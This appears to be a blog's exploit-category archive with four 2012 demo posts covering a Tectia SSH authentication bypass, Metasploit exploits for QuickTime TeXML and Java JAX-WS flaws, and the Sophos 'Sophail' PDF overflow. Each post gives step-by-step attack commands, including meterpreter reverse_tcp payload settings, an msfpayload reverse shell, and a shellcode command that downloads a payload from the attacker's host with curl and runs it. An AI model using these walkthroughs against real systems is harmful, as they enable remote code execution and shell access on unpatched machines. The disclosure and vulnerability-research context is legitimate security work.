Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01

PoC provided by :

kingcope

Reference(s) :

Full Disclosure Mailing-list

Affected version(s) :

All versions of Tectia SSH Server

Tested on Centos 5.8 x86 with :

Tectia SSH Server 6.3.2.33

Description :

An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified on AIX/Linux) can login without a password. The bug is in the “SSH USERAUTH CHANGE REQUEST” routines which are there to allow a user to change their password. A bug in the code allows an attacker to login without a password by forcing a password change request prior to authentication.

Commands :

Your OpenSSH client should be patched with the diff file provided by kingcope in order to force the password change request.

On the target :

ifconfig
uname -a
rpm -qi ssh-tectia-server-6.3.2-33

netstat -lntp

On the attacker :

ifconfig
uname -a

./ssh -lroot 192.168.178.34

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinated public release of the vulnerability on 2012-11-05
Metasploit PoC provided by juan vazquez on 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment a DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered being exploited in the wild by @kafeine on 2012-11-09
Metasploit PoC provided by juan vazquez on 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

Timeline :

Vulnerabilities reported to vendor by Tavis Ormandy on 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy on 2012-11-05
PoC provided by Tavis Ormandy on 2012-10-02

PoC provided by :

Tavis Ormandy

Reference(s) :

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s) :

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with :

Sophos Anti-Virus for Mac Home Edition

Description :

This PoC demonstrates one of the Sophos product vulnerabilities reported by Tavis Ormandy. It exploits a PDF stack buffer overflow vulnerability present in the Sophos on-access scanner.

Demo :

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make

4) Upload index.html, exploit.bin and exploit.png on a web server

5) Initiate a Metasploit multi/handler :

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

6) On the target surf index.html file

7) Exploit the session :)

sessions -i 1

id
/sbin/ifconfig
uname -a